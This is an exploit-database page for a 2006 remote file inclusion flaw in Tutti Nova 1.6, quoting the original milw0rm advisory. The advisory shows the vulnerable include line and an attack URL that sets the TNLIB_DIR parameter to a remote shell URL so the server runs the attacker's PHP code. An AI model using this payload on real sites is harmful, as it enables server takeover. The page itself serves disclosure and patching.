header-logo
Suggest Exploit
vendor:
Tutti Nova
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: Tutti Nova
Affected Version From: v1.6
Affected Version To: v1.6
Patch Exists: Yes
Related CWE: N/A
CPE: a:tuttinova:tuttinova:1.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Tutti Nova <= v1.6 (TNLIB_DIR) Remote File Inclusion Exploit

A vulnerability exists in Tutti Nova <= v1.6 due to improper validation of user-supplied input in the TNLIB_DIR parameter of the class.novaEdit.mysql.php script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by supplying a malicious URL in the TNLIB_DIR parameter.

Mitigation:

Upgrade to the latest version of Tutti Nova.
Source

Exploit-DB raw data:

#==============================================================================================
#Tutti Nova <= v1.6 (TNLIB_DIR) Remote File Inclusion Exploit
#===============================================================================================
#                                                                            
#Critical Level : Dangerous                                                  
#                                                                            
#Venedor site : http://prdownloads.sourceforge.net/tuttinova/tuttinova-1.6.zip             
#                                                                             
#Version : 3.5                                                  
#                                                               
#================================================================================================
#Bug in : include/novalib/class.novaEdit.mysql.php
#
#Vlu Code :
#--------------------------------
#  <?php
#
#  // FILE: class.novaEdit.mysql.php
#
#
#        require("{$TNLIB_DIR}class.novaRead.mysql.php");
#
#  class novaEdit extends novaRead
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/include/novalib/class.novaEdit.mysql.php?TNLIB_DIR=http://SHELLURL.COM?
#
#Example : http://uryuu.com/php/tuttinova-1.6/
#
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke XoRon Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf)
==================================================================================================

# milw0rm.com [2006-08-19]